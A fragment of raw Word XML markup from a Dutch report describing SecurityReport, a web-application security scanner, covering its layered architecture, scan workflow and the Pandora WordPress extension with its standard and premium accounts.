      </w:tr>
      <w:tr w:rsidR="00110CAA" w14:paraId="6EEDCBD6" w14:textId="77777777" w:rsidTr="0060535E">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>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pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Deze laag maakt gebruik van de service laag om de data te verwerken.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00110CAA" w14:paraId="1D1B424C" w14:textId="77777777" w:rsidTr="0060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50F8EA6F" w:rsidR="00110CAA" w:rsidRDefault="00186ACB">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Service laag maakt gebruik van deze laag om </w:t>
            </w:r>
            <w:r w:rsidR="008126EC">
              <w:t>toegang te verkrijgen naar de database door</w:t>
            </w:r>
            <w:r w:rsidR="002A38E3">
              <w:t>middel van een ORM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1A8D3947" w14:textId="17477A77" w:rsidR="00110CAA" w:rsidRDefault="00D03138">
      <w:r>
        <w:t>Tabel 4.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66CB15B2" w14:textId="50670C40" w:rsidR="006347E6" w:rsidRPr="00D41CBC" w:rsidRDefault="006347E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6401A27A" w14:textId="77777777" w:rsidR="0096760D" w:rsidRDefault="0096760D">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A61DEBF" w14:textId="65AE6678" w:rsidR="007A6BF3" w:rsidRPr="001E1D12" w:rsidRDefault="00F562D8">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252407808" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="53AB14A1" wp14:editId="61A89029">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>3810</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>304800</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6266180" cy="47409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stem flow.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId50">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6266180" cy="4740910"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00F81154">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252392448" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="28BBF867" wp14:editId="426A10EC">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-904427</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-1009164</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="502" name="Rectangle 50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2907B" id="Rectangle 502" o:spid="_x0000_s1026" style="position:absolute;margin-left:-71.2pt;margin-top:-79.4pt;width:25pt;height:1031.7pt;z-index:-25092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Ot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fEK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" fillcolor="#ffd966 [1943]" strokecolor="#ffd966" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00CA0E26" w:rsidRPr="001E1D12">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Workflow van het systeem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2186DA53" w14:textId="2C31EB0B" w:rsidR="00357E59" w:rsidRPr="005136DA" w:rsidRDefault="00D03138" w:rsidP="005136DA">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Figuur 4.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FEE31A0" w14:textId="7E2ACB36"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Het g</w:t>
      </w:r>
      <w:r w:rsidR="00231A66">
        <w:t>ehele proces staat in figuur 4.3</w:t>
      </w:r>
      <w:r w:rsidR="00546C8A">
        <w:t xml:space="preserve"> geïllustreerd </w:t>
      </w:r>
      <w:r w:rsidR="00AD566F">
        <w:t xml:space="preserve">en bestaat uit drie stappen. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EA706F" w14:textId="77777777" w:rsidR="00C63425" w:rsidRPr="00773B77" w:rsidRDefault="00C63425" w:rsidP="0015310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00773B77">
        <w:t>Registratie, activatie en aanvraag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7E35E6" w14:textId="62BDF7B4" w:rsidR="00C352B5" w:rsidRPr="00773B77" w:rsidRDefault="00C352B5" w:rsidP="0015310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00773B77">
        <w:t>Scannen en rapporteren</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027A40E7" w14:textId="7A076CD9" w:rsidR="00986970" w:rsidRDefault="00DB6AF4" w:rsidP="0015310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:sectPr w:rsidR="00986970" w:rsidSect="0096760D">
          <w:headerReference w:type="default" r:id="rId51"/>
          <w:headerReference w:type="first" r:id="rId52"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="0" w:right="1418" w:bottom="0" w:left="1418" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
      <w:r w:rsidRPr="00773B77">
        <w:t>Het verzenden en beheren van rapporten</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E0E6C4" w14:textId="77777777" w:rsidR="0096760D" w:rsidRDefault="0096760D" w:rsidP="007533C4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55434D39" w14:textId="67E8FC60" w:rsidR="006E3A79" w:rsidRDefault="007533C4" w:rsidP="007533C4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252191744" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="191EA7AC" wp14:editId="73F93A64">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-900169</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-1008866</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="516" name="Rectangle 5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59071" id="Rectangle 516" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.9pt;margin-top:-79.4pt;width:25pt;height:1031.7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" fillcolor="#ffd966 [1943]" strokecolor="#ffd966" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="006E3A79">
        <w:t xml:space="preserve">4.2 </w:t>
      </w:r>
      <w:r w:rsidR="00C75758">
        <w:t>Pandora CMS Extensie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9A4430" w14:textId="77777777" w:rsidR="0039461D" w:rsidRDefault="0039461D">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="791A8D5E" w14:textId="77777777" w:rsidR="00836D96" w:rsidRDefault="000463BA">
      <w:r>
        <w:t xml:space="preserve">Pandora is de CMS Extensie </w:t>
      </w:r>
      <w:r w:rsidR="00C3717C">
        <w:t>van SecurityReport</w:t>
      </w:r>
      <w:r w:rsidR="009461E0">
        <w:t xml:space="preserve"> waarmee</w:t>
      </w:r>
      <w:r w:rsidR="002D3989">
        <w:t xml:space="preserve"> WordPress</w:t>
      </w:r>
      <w:r w:rsidR="009461E0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00637E37">
        <w:t xml:space="preserve">gebruikers </w:t>
      </w:r>
      <w:r w:rsidR="00373891">
        <w:t>een security scan kunnen aanvragen</w:t>
      </w:r>
      <w:r w:rsidR="00752C80">
        <w:t xml:space="preserve">. Het doel van Pandora </w:t>
      </w:r>
      <w:r w:rsidR="00602381">
        <w:t xml:space="preserve">is om de gebruikers een </w:t>
      </w:r>
      <w:r w:rsidR="00245DE9">
        <w:t>client side</w:t>
      </w:r>
      <w:r w:rsidR="00602381">
        <w:t xml:space="preserve"> interface te geven waarmee er interactie gemaakt kan worden met de webapplicatie</w:t>
      </w:r>
      <w:r w:rsidR="00050BEB">
        <w:t xml:space="preserve"> scanner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB5959E" w14:textId="5ED67221" w:rsidR="004E4312" w:rsidRDefault="00EF1DBF">
      <w:r>
        <w:t>Pandora maakt gebruik van twee schermen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54714DAF" w14:textId="2E16CBD7" w:rsidR="00EF1DBF" w:rsidRDefault="00EF1DBF" w:rsidP="0015310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Registratiescherm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605EA1B4" w14:textId="3D4FB2A1" w:rsidR="00D9450D" w:rsidRDefault="00EF1DBF" w:rsidP="0015310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Aanvraagscherm</w:t>
      </w:r>
      <w:r w:rsidR="00D9450D">
        <w:t xml:space="preserve"> (standaard)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420FC073" w14:textId="1138A036" w:rsidR="00D9450D" w:rsidRDefault="00D9450D" w:rsidP="0015310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Aanvraagscherm (Premium)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5281E8" w14:textId="0D1B559B" w:rsidR="00D9450D" w:rsidRDefault="00D9450D" w:rsidP="00D9450D">
      <w:r>
        <w:t xml:space="preserve">Wanneer er een registratie wordt gedaan wordt de gebruiker gelijk verwezen naar het aanvraagscherm met gelimiteerde opties. SecurityReport weet op dat moment nog niet of het een klant is of niet. Op dat scherm wordt de gebruiker geïnformeerd over de premium account. Deze account type is bedoeld voor de bestaande klanten van S5 en de gebruikers die klant willen worden. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F6A773" w14:textId="7086249D" w:rsidR="00187FC4" w:rsidRPr="00187FC4" w:rsidRDefault="00935B55" w:rsidP="00D9450D">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Hoe activeer je de Premium</w:t>
      </w:r>
      <w:r w:rsidR="00187FC4" w:rsidRPr="00187FC4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>account?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDA2531" w14:textId="389AFA9E" w:rsidR="00235E56" w:rsidRDefault="000D478F" w:rsidP="00D9450D">
      <w:r>
        <w:t>Om het premium</w:t>
      </w:r>
      <w:r w:rsidR="00935B55">
        <w:t>account te activeren dient men contact op te nemen met S5. Op de standaard aanvraagscherm kan de gebruiker de contact informatie van S5 vinden. Na het verzoek ingediend te</w:t>
      </w:r>
      <w:r w:rsidR="00334B5C">
        <w:t xml:space="preserve"> hebben voor een premiumaccount</w:t>
      </w:r>
      <w:r w:rsidR="00935B55">
        <w:t xml:space="preserve"> zal S5 het standaardaccount veranderen in een premiumaccount. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE1B7EA" w14:textId="30CB8262" w:rsidR="00213DFD" w:rsidRDefault="00213DFD" w:rsidP="00D9450D">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00213DFD">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Kosten van een premium account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2D7775" w14:textId="1464380E" w:rsidR="00D25B17" w:rsidRPr="00D25B17" w:rsidRDefault="00D25B17" w:rsidP="00D9450D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252406784" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2DE265E9" wp14:editId="186C134D">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>370840</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>843915</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2159000" cy="9144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590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7BC19" w14:textId="5E30647D" w:rsidR="002A05E5" w:rsidRDefault="002A05E5"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2A05E5" w:rsidRPr="00D25B17" w:rsidRDefault="002A05E5" w:rsidP="00D25B17">
                            <w:pPr>
                              <w:contextualSpacing/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
                                <w:sz w:val="32"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
                                <w:sz w:val="32"/>
                              </w:rPr>
                              <w:t>Eenmalig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265E9" id="Text Box 57" o:spid="_x0000_s1068" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:29.2pt;margin-top:66.45pt;width:170pt;height:1in;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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="1457BC19" w14:textId="5E30647D" w:rsidR="002A05E5" w:rsidRDefault="002A05E5"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2A05E5" w:rsidRPr="00D25B17" w:rsidRDefault="002A05E5" w:rsidP="00D25B17">
                      <w:pPr>
                        <w:contextualSpacing/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
                          <w:sz w:val="32"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
                          <w:sz w:val="32"/>
                        </w:rPr>
                        <w:t>Eenmalig € 10,-</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="000F4377">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252405760" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="55EAEA84" wp14:editId="3B48EFE4">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>118110</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>730885</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2730500" cy="1186815"/>
                <wp:effectExtent l="0" t="0" r="38100" b="32385"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="21727"/>
                    <wp:lineTo x="21700" y="21727"/>
                    <wp:lineTo x="2170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27101" id="Rectangle 56" o:spid="_x0000_s1026" style="position:absolute;margin-left:9.3pt;margin-top:57.55pt;width:215pt;height:93.4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" fillcolor="white [3212]" strokecolor="#ffd966" strokeweight="1pt">
                <w10:wrap type="through"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00A62C51">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252403712" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="22FACB60" wp14:editId="3D905365">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3413760</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>958215</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2088515" cy="685165"/>
                <wp:effectExtent l="0" t="0" r="0" b="635"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="40" name="Text Box 40"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="208851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A6A7B" w14:textId="5143B205" w:rsidR="002A05E5" w:rsidRPr="00A62C51" w:rsidRDefault="002A05E5"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2A05E5" w:rsidRPr="00A62C51" w:rsidRDefault="002A05E5"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CB60" id="Text Box 40" o:spid="_x0000_s1069" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:268.8pt;margin-top:75.45pt;width:164.45pt;height:53.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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="172A6A7B" w14:textId="5143B205" w:rsidR="002A05E5" w:rsidRPr="00A62C51" w:rsidRDefault="002A05E5"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2A05E5" w:rsidRPr="00A62C51" w:rsidRDefault="002A05E5"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v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00A62C51" w:rsidRPr="000F4377">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252401664" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="35A507FE" wp14:editId="287702BA">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3101975</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>729615</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2730500" cy="1186815"/>
                <wp:effectExtent l="0" t="0" r="38100" b="32385"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="21727"/>
                    <wp:lineTo x="21700" y="21727"/>
                    <wp:lineTo x="217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DADE8" id="Rectangle 35" o:spid="_x0000_s1026" style="position:absolute;margin-left:244.25pt;margin-top:57.45pt;width:215pt;height:93.4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" fillcolor="white [3212]" strokecolor="#ffd966" strokeweight="1pt">
                <w10:wrap type="through"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="000F4377" w:rsidRPr="000F4377">
        <w:t xml:space="preserve">Het premiumaccount wordt geactiveerd wanneer er een betaling van </w:t>
      </w:r>
      <w:r w:rsidR="000F4377" w:rsidRPr="000F4377">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>€ 10,-</w:t>
      </w:r>
      <w:r w:rsidR="009402E1">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> gemaakt</w:t>
      </w:r>
      <w:r w:rsidR="00A912E8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> is</w:t>
      </w:r>
      <w:r w:rsidR="009402E1">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> aan S5. Zoals in de inleiding al is aangegeven biedt S5 ook service aan op gebied van websiteontwikkeling. Laat het bedrijf van de klant zijn website ontwikkelen bij S5 dan wordt het premiumaccount gelijk geactiveerd.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4CBD7D" w14:textId="16BCA352" w:rsidR="00D25B17" w:rsidRPr="008D3D82" w:rsidRDefault="00271FB5" w:rsidP="00D9450D">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252393472" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6C21B522" wp14:editId="686D555C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-130063</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1447800</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6096000" cy="2090420"/>
                <wp:effectExtent l="25400" t="25400" r="25400" b="17780"/>
                <wp:wrapNone/>
                <wp:docPr id="1" name="Rectangle 1"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="6096000" cy="2090420"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:ln w="38100">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65EA0" id="Rectangle 1" o:spid="_x0000_s1026" style="position:absolute;margin-left:-10.25pt;margin-top:114pt;width:480pt;height:164.6pt;z-index:-2509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" fillcolor="white [3212]" strokecolor="#ffd966" strokeweight="3pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252397568" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="112436DA" wp14:editId="2D4A04A5">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1320165</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1551940</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3175000" cy="34099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750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AB098" w14:textId="31F26C89" w:rsidR="002A05E5" w:rsidRPr="000B458C" w:rsidRDefault="002A05E5" w:rsidP="000B458C">
                            <w:pPr>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="28"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="28"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>Pandora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436DA" id="Text Box 15" o:spid="_x0000_s1070" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:103.95pt;margin-top:122.2pt;width:250pt;height:26.85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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="04CAB098" w14:textId="31F26C89" w:rsidR="002A05E5" w:rsidRPr="000B458C" w:rsidRDefault="002A05E5" w:rsidP="000B458C">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="28"/>
                          <w:lang w:val="en-US"/>
